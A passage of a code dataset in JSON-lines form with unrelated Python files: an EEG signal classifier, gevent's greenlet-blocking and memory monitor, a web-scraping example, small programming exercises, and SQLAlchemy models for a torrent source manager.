temp)\nsphere.m_matrix2 = transVector(sphere.m_mesh.m_normals, temp)\n\nglLoadIdentity()\nglTranslate(cube.m_position.x, cube.m_position.y, cube.m_position.z)\nglRotate(cube.m_rotate.t, cube.m_rotate.x, cube.m_rotate.y, cube.m_rotate.z)\ntemp = glGetDoublev(GL_MODELVIEW_MATRIX)\ncube.m_matrix1 = transPoint(cube.m_mesh.m_vertices, temp)\ncube.m_matrix2 = transVector(cube.m_mesh.m_normals, temp)\n\napp.exec_()\nsys.exit()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"123272308","text":"from struct_methods import *\nimport io\nimport numpy\nfrom scipy.signal import butter, lfilter\nimport math\nimport pickle\nimport random\n\n\nclass offlineParamOpt(object):\n def __init__(self, channel, num, groups, N=3):\n self.Fs = 1000\n self.filt_n = 4\n self.N = N \n self.channelRaw = channel\n self.channels = [i-1 for i in self.channelRaw]\n self.DataLength = len(self.channels)\n self.num = num\n self.samples_per_packet = 43\n self.allChannels = 16\n self.groups = groups\n self.NtoLastN = [i for i in range(N)]\n self.NtoLastN.extend([i for i in range(self.DataLength-N, self.DataLength)])\n self.classOne = numpy.zeros(shape=(16, 43*self.num, self.groups))\n self.classTwo = numpy.zeros(shape=(16, 43*self.num, self.groups))\n self.frequency = [[8,30], [8,13], [13,20], [20,30]]\n self.timepoint = [1000, 4000]\n\n def readOffData(self, path):\n self.fid = open(path, \"rb\")\n # self.fid.seek(0)\n currentGroupOne = 0\n currentGroupTwo = 0\n packets = 0\n while currentGroupOne != self.groups or currentGroupTwo != self.groups:\n trigger = read_uint16le(self.fid)\n packets += 1\n if trigger == 1:\n currentGroupOne += 1\n self.fid.seek(12, 1)\n all_samples = []\n for i in range(self.samples_per_packet): \n samples = []\n for j in range(self.allChannels):\n sample = read_uint16le(self.fid)\n samples.append(sample) \n all_samples.append(samples) \n first_Packet = numpy.array(all_samples)\n firstPacketMatrics = first_Packet.reshape((self.samples_per_packet, self.allChannels))\n self.classOne[:, 0:43, currentGroupOne-1] = firstPacketMatrics.T\n for p in range(self.num-1): \n self.fid.seek(14, 1)\n all_samples = []\n for i in range(self.samples_per_packet): \n samples = []\n for j in range(self.allChannels):\n sample = read_uint16le(self.fid)\n samples.append(sample) \n all_samples.append(samples)\n next_Packet = numpy.array(all_samples)\n nextPacketMatrics = next_Packet.reshape((self.samples_per_packet, self.allChannels))\n self.classOne[:, 43*p+43:43*p+86, currentGroupOne-1] = nextPacketMatrics.T\n elif trigger == 2:\n currentGroupTwo += 1\n self.fid.seek(12, 1)\n all_samples = []\n for i in range(self.samples_per_packet): \n samples = []\n for j in range(self.allChannels):\n sample = read_uint16le(self.fid)\n samples.append(sample) \n all_samples.append(samples) \n first_Packet = numpy.array(all_samples)\n firstPacketMatrics = first_Packet.reshape((self.samples_per_packet, self.allChannels))\n self.classTwo[:, 0:43, currentGroupTwo-1] = firstPacketMatrics.T\n for p in range(self.num-1): \n self.fid.seek(14, 1)\n all_samples = []\n for i in range(self.samples_per_packet): \n samples = []\n for j in range(self.allChannels):\n sample = read_uint16le(self.fid)\n samples.append(sample) \n all_samples.append(samples)\n next_Packet = numpy.array(all_samples)\n nextPacketMatrics = next_Packet.reshape((self.samples_per_packet, self.allChannels))\n self.classTwo[:, 43*p+43:43*p+86, currentGroupTwo-1] = nextPacketMatrics.T\n else:\n self.fid.seek(1388, 1)\n self.fid.close()\n\n def offlineClass(self, path):\n self.readOffData(path)\n trainGroups = int(0.8*self.groups)\n testGroups = self.groups - trainGroups\n acc = numpy.zeros((4,100)) # need to change\n for fre in range(4):\n Wn = [self.frequency[fre][0]/(self.Fs/2), self.frequency[fre][1]/(self.Fs/2)]\n filter_b, filter_a = butter(self.filt_n, Wn, btype='band')\n Cov1 = numpy.zeros(shape=(self.DataLength, self.DataLength, self.groups)) \n Cov2 = numpy.zeros(shape=(self.DataLength, self.DataLength, self.groups))\n for i in range(self.groups):\n dataTofilter = self.classOne[self.channels, :, i]\n dataFiltered = lfilter(filter_b, filter_a, dataTofilter, axis=1)\n Dr = dataFiltered[:, self.timepoint[0]:self.timepoint[1]]\n Cov1[:, :, i] = numpy.dot(Dr, Dr.T)\n dataTofilter = self.classTwo[self.channels, :, i]\n dataFiltered = lfilter(filter_b, filter_a, dataTofilter, axis=1)\n Dr = dataFiltered[:, self.timepoint[0]:self.timepoint[1]]\n Cov2[:, :, i] = numpy.dot(Dr, Dr.T)\n for cross in range(100):\n randGroup =[i for i in range(self.groups)]\n random.shuffle(randGroup)\n R1 = numpy.zeros(shape=(self.DataLength, self.DataLength))\n R2 = numpy.zeros(shape=(self.DataLength, self.DataLength))\n for t in range(trainGroups):\n R1 += Cov1[:, :, randGroup[t]]\n R2 += Cov2[:, :, randGroup[t]]\n R1 = R1/numpy.trace(R1)\n R2 = R2/numpy.trace(R2)\n R3 = R1 + R2\n sigma, U0 = numpy.linalg.eig(R3)\n P = numpy.dot(numpy.diag(sigma**(-0.5)), U0.T)\n YL = numpy.dot(numpy.dot(P,R1),P.T)\n sigmaL, UL = numpy.linalg.eig(YL)\n Isorted = numpy.argsort(-sigmaL)\n F = numpy.dot(P.T, UL[:, Isorted[self.NtoLastN]])\n f = numpy.zeros(shape=(2*self.N, 1))\n f1 = numpy.zeros(shape=(2*self.N, self.groups))\n f2 = numpy.zeros(shape=(2*self.N, self.groups))\n for i in range(trainGroups):\n for j in range(2*self.N):\n f[j, 0] = numpy.log(numpy.dot(numpy.dot(F[:,j].reshape(1, self.DataLength),Cov1[:,:,randGroup[i]]),F[:,j]))\n f1[:, i] = f[:, 0]\n for j in range(2*self.N):\n f[j, 0] = numpy.log(numpy.dot(numpy.dot(F[:,j].reshape(1, self.DataLength),Cov2[:,:,randGroup[i]]),F[:,j]))\n f2[:, i] = f[:, 0]\n F1 = f1.T\n F2 = f2.T\n M1 = numpy.mean(F1, 0)\n M1.shape = (2*self.N, 1)\n M2 = numpy.mean(F2, 0)\n M2.shape = (2*self.N, 1)\n count1 = numpy.size(f1, 1)-1\n count2 = numpy.size(f2, 1)-1 \n w = numpy.dot(numpy.linalg.inv((count1*numpy.cov(F1.T)+count2*numpy.cov(F2.T))/(count1+count2)),(M2-M1)).reshape(1,2*self.N)\n b = -numpy.dot(w,M1+M2)/2\n TypeOneSign = numpy.dot(w, M1)+b\n right = 0\n for i in range(trainGroups, self.groups):\n for j in range(2*self.N): \n f[j, 0] = numpy.log(numpy.dot(numpy.dot(F[:,j].reshape(1, self.DataLength),Cov1[:,:,randGroup[i]]),F[:,j]))\n y = numpy.dot(w, f)+b\n if y*TypeOneSign >= 0:\n right +=1 \n for j in range(2*self.N): \n f[j, 0] = numpy.log(numpy.dot(numpy.dot(F[:,j].reshape(1, self.DataLength),Cov2[:,:,randGroup[i]]),F[:,j]))\n y = numpy.dot(w, f)+b\n if y*TypeOneSign <= 0:\n right +=1\n acc[fre, cross] = right/(2*testGroups)\n meanAcc = numpy.mean(acc, axis=1)\n meanaccList = meanAcc.tolist()\n frequencyIndex = meanaccList.index(max(meanaccList))\n return meanaccList, frequencyIndex","sub_path":"offlineParamOptimization.py","file_name":"offlineParamOptimization.py","file_ext":"py","file_size_in_byte":8442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"222305836","text":"def main():\n N = int(input('Digite um número inteiro: '))\n limite_inferior = int(input('Informe um valor para o limite inferior: '))\n limite_superior = int(input('Informe um valor para o limite superior: '))\n\n multiplo(N, limite_inferior, limite_superior)\n\ndef multiplo(numero, inferior, supeior):\n print(f'Os números no intervalo de {inferior} a {supeior} que são múltiplos de {numero} são: ',end=' ')\n while inferior <= supeior:\n if inferior % numero == 0:\n print(inferior, end=' ')\n inferior += 1\nmain()","sub_path":"Lista_Prof_Fabio/Algoritmos_Exercicio-03-REPETICAO-WHILE/fb_ex3_q8-while.py","file_name":"fb_ex3_q8-while.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"484203743","text":"# Copyright (c) 2018 gevent. See LICENSE for details.\nfrom __future__ import print_function, absolute_import, division\n\nimport os\nimport sys\nimport traceback\n\nfrom weakref import ref as wref\n\nfrom greenlet import settrace\nfrom greenlet import getcurrent\n\nfrom gevent import config as GEVENT_CONFIG\nfrom gevent.monkey import get_original\nfrom gevent.util import format_run_info\nfrom gevent.events import notify\nfrom gevent.events import EventLoopBlocked\nfrom gevent.events import MemoryUsageThresholdExceeded\nfrom gevent.events import MemoryUsageUnderThreshold\nfrom gevent.events import IPeriodicMonitorThread\nfrom gevent.events import implementer\n\nfrom gevent._compat import thread_mod_name\nfrom gevent._compat import perf_counter\nfrom gevent._util import gmctime\n\n\n__all__ = [\n 'PeriodicMonitoringThread',\n]\n\nget_thread_ident = get_original(thread_mod_name, 'get_ident')\nstart_new_thread = get_original(thread_mod_name, 'start_new_thread')\nthread_sleep = get_original('time', 'sleep')\n\n\n\nclass MonitorWarning(RuntimeWarning):\n \"\"\"The type of warnings we emit.\"\"\"\n\n\nclass GreenletTracer(object):\n\n # A counter, incremented by the greenlet trace function\n # we install on every greenlet switch. This is reset when the\n # periodic monitoring thread runs.\n greenlet_switch_counter = 0\n\n # The greenlet last switched to.\n active_greenlet = None\n\n # The trace function that was previously installed,\n # if any.\n previous_trace_function = None\n\n def __init__(self):\n prev_trace = settrace(self)\n self.previous_trace_function = prev_trace\n\n def kill(self): # pylint:disable=method-hidden\n # Must be called in the monitored thread.\n settrace(self.previous_trace_function)\n self.previous_trace_function = None\n # Become a no-op\n self.kill = lambda: None\n\n def __call__(self, event, args):\n # This function runs in the thread we are monitoring.\n self.greenlet_switch_counter += 1\n if event in ('switch', 'throw'):\n # args is (origin, target). This is the only defined\n # case\n self.active_greenlet = args[1]\n else:\n self.active_greenlet = None\n if self.previous_trace_function is not None:\n self.previous_trace_function(event, args)\n\n def did_block_hub(self, hub):\n # Check to see if we have blocked since the last call to this\n # method. Returns a true value if we blocked (not in the hub),\n # a false value if everything is fine.\n\n # This may be called in the same thread being traced or a\n # different thread; if a different thread, there is a race\n # condition with this being incremented in the thread we're\n # monitoring, but probably not often enough to lead to\n # annoying false positives.\n\n active_greenlet = self.active_greenlet\n did_switch = self.greenlet_switch_counter != 0\n self.greenlet_switch_counter = 0\n\n if did_switch or active_greenlet is None or active_greenlet is hub:\n # Either we switched, or nothing is running (we got a\n # trace event we don't know about or were requested to\n # ignore), or we spent the whole time in the hub, blocked\n # for IO. Nothing to report.\n return False\n return True, active_greenlet\n\n def ignore_current_greenlet_blocking(self):\n # Don't pay attention to the current greenlet.\n self.active_greenlet = None\n\n def monitor_current_greenlet_blocking(self):\n self.active_greenlet = getcurrent()\n\n def did_block_hub_report(self, hub, active_greenlet, format_kwargs):\n report = ['=' * 80,\n '\\n%s : Greenlet %s appears to be blocked' %\n (gmctime(), active_greenlet)]\n report.append(\" Reported by %s\" % (self,))\n try:\n frame = sys._current_frames()[hub.thread_ident]\n except KeyError:\n # The thread holding the hub has died. Perhaps we shouldn't\n # even report this?\n stack = [\"Unknown: No thread found for hub %r\\n\" % (hub,)]\n else:\n stack = traceback.format_stack(frame)\n report.append('Blocked Stack (for thread id %s):' % (hex(hub.thread_ident),))\n report.append(''.join(stack))\n report.append(\"Info:\")\n report.extend(format_run_info(**format_kwargs))\n\n return report\n\nclass _HubTracer(GreenletTracer):\n def __init__(self, hub, max_blocking_time):\n GreenletTracer.__init__(self)\n self.max_blocking_time = max_blocking_time\n self.hub = hub\n\n def kill(self): # pylint:disable=method-hidden\n self.hub = None\n GreenletTracer.kill(self)\n\n\nclass HubSwitchTracer(_HubTracer):\n # A greenlet tracer that records the last time we switched *into* the hub.\n\n last_entered_hub = 0\n\n def __call__(self, event, args):\n GreenletTracer.__call__(self, event, args)\n if self.active_greenlet is self.hub:\n self.last_entered_hub = perf_counter()\n\n def did_block_hub(self, hub):\n if perf_counter() - self.last_entered_hub > self.max_blocking_time:\n return True, self.active_greenlet\n\n\nclass MaxSwitchTracer(_HubTracer):\n # A greenlet tracer that records the maximum time between switches,\n # not including time spent in the hub.\n\n max_blocking = 0\n\n def __init__(self, hub, max_blocking_time):\n _HubTracer.__init__(self, hub, max_blocking_time)\n self.last_switch = perf_counter()\n\n def __call__(self, event, args):\n old_active = self.active_greenlet\n GreenletTracer.__call__(self, event, args)\n if old_active is not self.hub and old_active is not None:\n # If we're switching out of the hub, the blocking\n # time doesn't count.\n switched_at = perf_counter()\n self.max_blocking = max(self.max_blocking,\n switched_at - self.last_switch)\n\n def did_block_hub(self, hub):\n if self.max_blocking == 0:\n # We never switched. Check the time now\n self.max_blocking = perf_counter() - self.last_switch\n\n if self.max_blocking > self.max_blocking_time:\n return True, self.active_greenlet\n\n\nclass _MonitorEntry(object):\n\n __slots__ = ('function', 'period', 'last_run_time')\n\n def __init__(self, function, period):\n self.function = function\n self.period = period\n self.last_run_time = 0\n\n def __eq__(self, other):\n return self.function == other.function and self.period == other.period\n\n def __repr__(self):\n return repr((self.function, self.period, self.last_run_time))\n\n\n@implementer(IPeriodicMonitorThread)\nclass PeriodicMonitoringThread(object):\n # This doesn't extend threading.Thread because that gets monkey-patched.\n # We use the low-level 'start_new_thread' primitive instead.\n\n # The amount of seconds we will sleep when we think we have nothing\n # to do.\n inactive_sleep_time = 2.0\n\n # The absolute minimum we will sleep, regardless of\n # what particular monitoring functions want to say.\n min_sleep_time = 0.005\n\n # The minimum period in seconds at which we will check memory usage.\n # Getting memory usage is fairly expensive.\n min_memory_monitor_period = 2\n\n # A list of _MonitorEntry objects: [(function(hub), period, last_run_time))]\n # The first entry is always our entry for self.monitor_blocking\n _monitoring_functions = None\n\n # The calculated min sleep time for the monitoring functions list.\n _calculated_sleep_time = None\n\n # A boolean value that also happens to capture the\n # memory usage at the time we exceeded the threshold. Reset\n # to 0 when we go back below.\n _memory_exceeded = 0\n\n # The instance of GreenletTracer we're using\n _greenlet_tracer = None\n\n def __init__(self, hub):\n self._hub_wref = wref(hub, self._on_hub_gc)\n self.should_run = True\n\n # Must be installed in the thread that the hub is running in;\n # the trace function is threadlocal\n assert get_thread_ident() == hub.thread_ident\n self._greenlet_tracer = GreenletTracer()\n\n self._monitoring_functions = [_MonitorEntry(self.monitor_blocking,\n GEVENT_CONFIG.max_blocking_time)]\n self._calculated_sleep_time = GEVENT_CONFIG.max_blocking_time\n # Create the actual monitoring thread. This is effectively a \"daemon\"\n # thread.\n self.monitor_thread_ident = start_new_thread(self, ())\n\n # We must track the PID to know if your thread has died after a fork\n self.pid = os.getpid()\n\n def _on_fork(self):\n # Pseudo-standard method that resolver_ares and threadpool\n # also have, called by hub.reinit()\n pid = os.getpid()\n if pid != self.pid:\n self.pid = pid\n self.monitor_thread_ident = start_new_thread(self, ())\n\n @property\n def hub(self):\n return self._hub_wref()\n\n\n def monitoring_functions(self):\n # Return a list of _MonitorEntry objects\n\n # Update max_blocking_time each time.\n mbt = GEVENT_CONFIG.max_blocking_time # XXX: Events so we know when this changes.\n if mbt != self._monitoring_functions[0].period:\n self._monitoring_functions[0].period = mbt\n self._calculated_sleep_time = min(x.period for x in self._monitoring_functions)\n return self._monitoring_functions\n\n def add_monitoring_function(self, function, period):\n if not callable(function):\n raise ValueError(\"function must be callable\")\n\n if period is None:\n # Remove.\n self._monitoring_functions = [\n x for x in self._monitoring_functions\n if x.function != function\n ]\n elif period <= 0:\n raise ValueError(\"Period must be positive.\")\n else:\n # Add or update period\n entry = _MonitorEntry(function, period)\n self._monitoring_functions = [\n x if x.function != function else entry\n for x in self._monitoring_functions\n ]\n if entry not in self._monitoring_functions:\n self._monitoring_functions.append(entry)\n self._calculated_sleep_time = min(x.period for x in self._monitoring_functions)\n\n def calculate_sleep_time(self):\n min_sleep = self._calculated_sleep_time\n if min_sleep <= 0:\n # Everyone wants to be disabled. Sleep for a longer period of\n # time than usual so we don't spin unnecessarily. We might be\n # enabled again in the future.\n return self.inactive_sleep_time\n return max((min_sleep, self.min_sleep_time))\n\n def kill(self):\n if not self.should_run:\n # Prevent overwriting trace functions.\n return\n # Stop this monitoring thread from running.\n self.should_run = False\n # Uninstall our tracing hook\n self._greenlet_tracer.kill()\n\n def _on_hub_gc(self, _):\n self.kill()\n\n def __call__(self):\n # The function that runs in the monitoring thread.\n # We cannot use threading.current_thread because it would\n # create an immortal DummyThread object.\n getcurrent().gevent_monitoring_thread = wref(self)\n\n try:\n while self.should_run:\n functions = self.monitoring_functions()\n assert functions\n sleep_time = self.calculate_sleep_time()\n\n thread_sleep(sleep_time)\n\n # Make sure the hub is still around, and still active,\n # and keep it around while we are here.\n hub = self.hub\n if not hub:\n self.kill()\n\n if self.should_run:\n this_run = perf_counter()\n for entry in functions:\n f = entry.function\n period = entry.period\n last_run = entry.last_run_time\n if period and last_run + period <= this_run:\n entry.last_run_time = this_run\n f(hub)\n del hub # break our reference to hub while we sleep\n\n except SystemExit:\n pass\n except: # pylint:disable=bare-except\n # We're a daemon thread, so swallow any exceptions that get here\n # during interpreter shutdown.\n if not sys or not sys.stderr: # pragma: no cover\n # Interpreter is shutting down\n pass\n else:\n hub = self.hub\n if hub is not None:\n # XXX: This tends to do bad things like end the process, because we\n # try to switch *threads*, which can't happen. Need something better.\n hub.handle_error(self, *sys.exc_info())\n\n def monitor_blocking(self, hub):\n # Called periodically to see if the trace function has\n # fired to switch greenlets. If not, we will print\n # the greenlet tree.\n\n # For tests, we return a true value when we think we found something\n # blocking\n\n did_block = self._greenlet_tracer.did_block_hub(hub)\n if not did_block:\n return\n\n active_greenlet = did_block[1]\n report = self._greenlet_tracer.did_block_hub_report(\n hub, active_greenlet,\n dict(greenlet_stacks=False, current_thread_ident=self.monitor_thread_ident))\n\n stream = hub.exception_stream\n for line in report:\n # Printing line by line may interleave with other things,\n # but it should also prevent a \"reentrant call to print\"\n # when the report is large.\n print(line, file=stream)\n\n notify(EventLoopBlocked(active_greenlet, GEVENT_CONFIG.max_blocking_time, report))\n return (active_greenlet, report)\n\n def ignore_current_greenlet_blocking(self):\n self._greenlet_tracer.ignore_current_greenlet_blocking()\n\n def monitor_current_greenlet_blocking(self):\n self._greenlet_tracer.monitor_current_greenlet_blocking()\n\n def _get_process(self): # pylint:disable=method-hidden\n try:\n # The standard library 'resource' module doesn't provide\n # a standard way to get the RSS measure, only the maximum.\n # You might be tempted to try to compute something by adding\n # together text and data sizes, but on many systems those come back\n # zero. So our only option is psutil.\n from psutil import Process, AccessDenied\n # Make sure it works (why would we be denied access to our own process?)\n try:\n proc = Process()\n proc.memory_full_info()\n except AccessDenied: # pragma: no cover\n proc = None\n except ImportError:\n proc = None\n\n self._get_process = lambda: proc\n return proc\n\n def can_monitor_memory_usage(self):\n return self._get_process() is not None\n\n def install_monitor_memory_usage(self):\n # Start monitoring memory usage, if possible.\n # If not possible, emit a warning.\n if not self.can_monitor_memory_usage():\n import warnings\n warnings.warn(\"Unable to monitor memory usage. Install psutil.\",\n MonitorWarning)\n return\n\n self.add_monitoring_function(self.monitor_memory_usage,\n max(GEVENT_CONFIG.memory_monitor_period,\n self.min_memory_monitor_period))\n\n def monitor_memory_usage(self, _hub):\n max_allowed = GEVENT_CONFIG.max_memory_usage\n if not max_allowed:\n # They disabled it.\n return -1 # value for tests\n\n rusage = self._get_process().memory_full_info()\n # uss only documented available on Windows, Linux, and OS X.\n # If not available, fall back to rss as an aproximation.\n mem_usage = getattr(rusage, 'uss', 0) or rusage.rss\n\n event = None # Return value for tests\n\n if mem_usage > max_allowed:\n if mem_usage > self._memory_exceeded:\n # We're still growing\n event = MemoryUsageThresholdExceeded(\n mem_usage, max_allowed, rusage)\n notify(event)\n self._memory_exceeded = mem_usage\n else:\n # we're below. Were we above it last time?\n if self._memory_exceeded:\n event = MemoryUsageUnderThreshold(\n mem_usage, max_allowed, rusage, self._memory_exceeded)\n notify(event)\n self._memory_exceeded = 0\n\n return event\n\n def __repr__(self):\n return '<%s at %s in thread %s greenlet %r for %r>' % (\n self.__class__.__name__,\n hex(id(self)),\n hex(self.monitor_thread_ident),\n getcurrent(),\n self._hub_wref())\n","sub_path":"src/gevent/_monitor.py","file_name":"_monitor.py","file_ext":"py","file_size_in_byte":17195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"620387523","text":"import bs4, requests\r\n\r\nres = requests.get(\"http://automatetheboringstuff.com/\")\r\nres.raise_for_status()\r\n\r\nsoup = bs4.BeautifulSoup(res.text, \"html.parser\")\r\n# right click element > inspect\r\n# right click highlighted code > copy > copy selector\r\nelems = soup.select(\"body > div.main > div:nth-child(1) > h2:nth-child(19)\")\r\nprint(elems[0].text)\r\n","sub_path":"0_reference/AutomateTheBoringStuff/example_web_html.py","file_name":"example_web_html.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"192426306","text":"# 1812 / calculate how many tiles will be needed\nfor T in range(int(input())):\n N, M = map(int, input().split()) # number of needed tiles, len of basic tile\n S = sorted(list(map(int, input().split())), reverse=True) # power number list\n\n # set basic number of needed tiles and remain tiles list\n cnt = 1\n areas = [(M, M)]\n for s in S:\n ln = 2 ** s # calculate len of cutting tile\n for i in range(len(areas)):\n w, h = areas[i] # compare width and height of cutted tile\n # if len of original tile is bigger, cut it\n if w >= ln and h >= ln:\n areas.append((w - ln, h - ln))\n areas.append((w - ln, ln))\n areas.append((ln, h - ln))\n areas = areas[:i] + areas[i + 1:]\n break\n # else plus 1 to counter and add cutted tile\n elif i == len(areas) - 1:\n cnt += 1\n areas.append((M - ln, M - ln))\n areas.append((M - ln, ln))\n areas.append((ln, M - ln))\n\n print(f'#{T + 1} {cnt}')\n ","sub_path":"D5/1812.py","file_name":"1812.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"125918260","text":"# -*- coding: utf-8 -*-\n\n# Copyright (C) 2017 Luis López \n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,\n# USA.\n\n\nimport re\nimport sys\nfrom urllib import parse\n\n\nfrom appkit import utils\nfrom appkit.db import sqlalchemyutils as sautils\nfrom sqlalchemy import (\n Column,\n Integer,\n String,\n ForeignKey,\n and_,\n # event,\n func,\n orm,\n schema\n)\nfrom sqlalchemy.ext.hybrid import hybrid_property\n\n\nfrom arroyo import bittorrentlib\n\n\nsautils.Base.metadata.naming_convention = {\n \"ix\": 'ix_%(column_0_label)s',\n \"uq\": \"uq_%(table_name)s_%(column_0_name)s\",\n \"ck\": \"ck_%(table_name)s_%(constraint_name)s\",\n \"fk\": \"fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s\",\n \"pk\": \"pk_%(table_name)s\"\n}\n\n\nclass Variable(sautils.KeyValueItem, sautils.Base):\n __tablename__ = 'variable'\n __table_args__ = schema.UniqueConstraint('key'),\n\n\nclass Source(sautils.Base):\n __tablename__ = 'source'\n\n # Required\n id = Column(Integer, autoincrement=True, primary_key=True)\n name = Column(String, nullable=False)\n uri = Column(String, nullable=False, unique=True)\n provider = Column(String, nullable=False)\n\n # EntitySupport\n episode_id = Column(Integer,\n ForeignKey('episode.id', ondelete=\"SET NULL\"),\n nullable=True)\n episode = orm.relationship('Episode',\n uselist=False,\n backref=orm.backref(\"sources\",\n cascade_backrefs=False,\n lazy='select'))\n\n movie_id = Column(Integer,\n ForeignKey('movie.id', ondelete=\"SET NULL\"),\n nullable=True)\n movie = orm.relationship('Movie',\n uselist=False,\n backref=orm.backref(\"sources\",\n cascade_backrefs=False,\n lazy='select'))\n\n def __init__(self, name, uri, provider,\n timestamp=None,\n size=None,\n seeds=None,\n leechers=None,\n type=None,\n language=None,\n meta=None,\n tags=None):\n\n # Non database attributes\n self.meta = meta or []\n self.language = language\n self.leechers = leechers\n self.seeds = seeds\n self.size = size\n self.timestamp = timestamp or utils.now_timestamp()\n self.tags = tags or []\n self.type = type\n\n super().__init__(name=name, uri=uri, provider=provider)\n\n def __eq__(self, other):\n return _eq_from_attrs(self, other, ('uri',))\n\n def __lt__(self, other):\n return _lt_from_attrs(self, other, ('name',))\n\n def __repr__(self):\n return \"\".format(\n id=self.id or '??',\n oid=id(self),\n fmt=self.format())\n\n def __str__(self):\n return self.format()\n\n def __hash__(self):\n return hash(self.uri)\n\n @orm.validates('name', 'provider', 'urn', 'uri', 'language', 'type')\n def validate(self, key, value):\n \"\"\"\n Wrapper around static method normalize\n \"\"\"\n return self.normalize(key, value)\n\n @staticmethod\n def normalize(key, value):\n def _normalize():\n nonlocal key\n nonlocal value\n\n # Those keys must be a non empty strings\n if key in ['name', 'provider', 'urn', 'uri']:\n if value == '':\n raise ValueError()\n\n return str(value)\n\n # Those keys must be an integer (not None)\n elif key in ['created', 'last_seen']:\n return int(value)\n\n # Those keys must be an integer or None\n elif key in ['size', 'seeds', 'leechers']:\n if value is None:\n return None\n\n return int(key)\n\n # language must be in form of xxx-xx or None\n elif key == 'language':\n if value is None:\n return None\n\n value = str(value)\n\n if not re.match(r'^...(\\-..)?$', value):\n raise ValueError()\n\n return value\n\n # type is limited to some strings or None\n elif key == 'type':\n if value is None:\n return None\n\n value = str(value)\n\n if value in (\n 'application',\n 'book',\n 'episode',\n 'game',\n 'movie',\n 'music',\n 'other',\n 'xxx'):\n return value\n\n raise ValueError()\n\n else:\n raise KeyError()\n\n # Wrap the whole process for easy exception handling\n try:\n return _normalize()\n\n except TypeError as e:\n msg = 'invalid type for {key}: {type}'\n msg = msg.format(key=key, type=type(value))\n raise TypeError(msg) from e\n\n except ValueError as e:\n msg = 'invalid value for {key}: {value}'\n msg = msg.format(key=key, value=repr(value))\n raise ValueError(msg) from e\n\n @hybrid_property\n def entity(self):\n return _entity_getter(self)\n\n @entity.setter\n def entity(self, entity):\n _entity_setter(self, entity)\n\n @property\n def age(self):\n return utils.now_timestamp() - self.timestamp\n\n @property\n def needs_postprocessing(self):\n return self.urn is None and self.uri is not None\n\n @property\n def ratio(self):\n seeds = self.seeds if self.seeds is not None else 0\n leechers = self.leechers if self.leechers is not None else 0\n\n if not self.seeds and not self.leechers:\n return None\n\n if seeds and leechers == 0:\n return float(sys.maxsize)\n\n if seeds == 0 and leechers:\n return 0.0\n\n return seeds / leechers\n\n @property\n def selected(self):\n return (\n self.entity and\n self.entity.selection and\n self.entity.selection.source == self)\n\n @property\n def urn(self):\n if self.uri.startswith('http'):\n return None\n\n qs = parse.urlparse(self.uri).query\n try:\n urn = parse.parse_qs(qs)['xt'][-1]\n except KeyError:\n return None\n urn = bittorrentlib.normalize_urn(urn)\n return urn.lstrip('urn:')\n\n def asdict(self):\n return _asdict_from_attrs(\n self, (\n 'age',\n 'entity',\n 'episode',\n 'episode_id',\n 'id',\n 'language',\n 'leechers',\n 'movie',\n 'movie_id',\n 'name',\n 'provider',\n 'ratio',\n 'seeds',\n 'size',\n 'tags',\n 'timestamp',\n 'type',\n 'uri',\n 'urn'))\n\n def format(self, fmt='{name}', extra_data={}):\n data = self.asdict()\n data['seeds'] = data.get('seeds', '-')\n data['leechers'] = data.get('leechers', '-')\n data['language'] = data.get('language', 'unknow')\n data.update(extra_data)\n\n return fmt.format(**data)\n\n\n# @event.listens_for(Source.tags, 'dispose_collection')\n# @event.listens_for(Source.tags, 'init_collection')\n# @event.listens_for(Source.tags, 'remove')\n# def _source_tags_modifier_cb(target, *args):\n# target.tags_map = {tag.key: tag.value for tag in target.tags}\n\n\n# class SourceTag(sautils.KeyValueItem, sautils.Base):\n# __tablename__ = 'sourcetag'\n# __table_args__ = (\n# schema.UniqueConstraint('source_id', 'key'),\n# )\n\n# source_id = Column(Integer, ForeignKey('source.id', ondelete=\"cascade\"))\n# source = orm.relationship(\"Source\", back_populates=\"tags\", uselist=False)\n\n\n# class Selection(sautils.Base):\n# __tablename__ = 'selection'\n# __mapper_args__ = {\n# 'polymorphic_on': 'type'\n# }\n\n# id = Column(Integer, primary_key=True)\n# type = Column(String(50))\n# source_id = Column(Integer,\n# ForeignKey('source.id', ondelete=\"cascade\"),\n# nullable=False)\n# source = orm.relationship('Source')\n\n# @hybrid_property\n# def entity(self):\n# return _entity_getter(self)\n\n# @entity.setter\n# def entity(self, entity):\n# _entity_setter(self, entity)\n\n\n# class EpisodeSelection(Selection):\n# __mapper_args__ = {\n# 'polymorphic_identity': 'episode'\n# }\n\n# episode_id = Column(Integer,\n# ForeignKey('episode.id', ondelete=\"CASCADE\"),\n# nullable=True)\n# episode = orm.relationship(\"Episode\",\n# backref=orm.backref(\"selection\",\n# cascade=\"all, delete\",\n# uselist=False))\n\n# def __repr__(self):\n# fmt = ' source:{source}'\n# return fmt.format(\n# id=self.id,\n# episode=repr(self.episode),\n# source=repr(self.source))\n\n\n# class MovieSelection(Selection):\n# __mapper_args__ = {\n# 'polymorphic_identity': 'movie'\n# }\n\n# movie_id = Column(Integer,\n# ForeignKey('movie.id', ondelete=\"CASCADE\"),\n# nullable=True)\n# movie = orm.relationship(\"Movie\",\n# backref=orm.backref(\"selection\",\n# cascade=\"all, 